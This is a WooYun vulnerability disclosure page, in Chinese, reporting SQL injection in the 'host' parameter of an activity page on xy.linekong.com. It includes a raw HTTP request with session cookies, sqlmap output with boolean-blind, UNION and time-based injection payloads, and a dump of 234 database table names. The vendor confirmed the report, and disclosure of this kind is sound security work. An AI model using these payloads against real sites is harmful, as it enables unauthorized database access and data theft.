当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115352

漏洞标题:蓝港科技《西游记》sql注入注入第四弹

相关厂商:linekong.com

漏洞作者: 风之传说

提交时间:2015-05-22 10:48

修复时间:2015-07-09 14:34

公开时间:2015-07-09 14:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

蓝港科技《西游记》sql注入注入第四弹

详细说明:

继续来帮你们找漏洞啦。。本来又提交了一个第四弹的。。没想到没被通过啊。。从新又找了一个,这个注入应该没人找到吧。。
直接给出测试的数据包:

POST /activity/superMM/_do_selectplayer.ajax.php HTTP/1.1
Host: xy.linekong.com
Proxy-Connection: keep-alive
Content-Length: 11
Accept: text/html, */*
Origin: http://xy.linekong.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://xy.linekong.com/activity/superMM/note.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=5389347840; PHPSESSID=pcii8pkinj9i8kn5qni54ucrp7; pgv_si=s4919567360; __utmt=1; page_hash=3a88ff73c7ca815ea74c7e7295fa7788; __utma=105338506.1099027272.1432191841.1432191841.1432191841.1; __utmb=105338506.25.10.1432191841; __utmc=105338506; __utmz=105338506.1432191841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
host=601022


host参数存在注入。。。

POST parameter 'host' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) req
ests:
---
Place: POST
Parameter: host
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: host=601022' AND 3034=3034 AND 'nVzN'='nVzN
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: host=601022' UNION ALL SELECT NULL,CONCAT(0x7170716a71,0x646b6e646
4447707478,0x7170787871),NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: host=601022' AND SLEEP(5) AND 'oNSa'='oNSa
---
[16:04:20] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


然后看看数据库:

[*] information_schema
[*] xy_web


然后表:

Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+


234个表。。赶紧修补吧。。

漏洞证明:

如上

修复方案:

都送了两次礼物了,能不能说下送的啥礼物啊。。O(∩_∩)O

版权声明:转载请注明来源 风之传说@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-25 14:33

厂商回复:

漏洞已确认,正在联系开发人员处理

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-09 14:55 | 蓝港在线(北京)科技有限公司(乌云厂商)

    十分感谢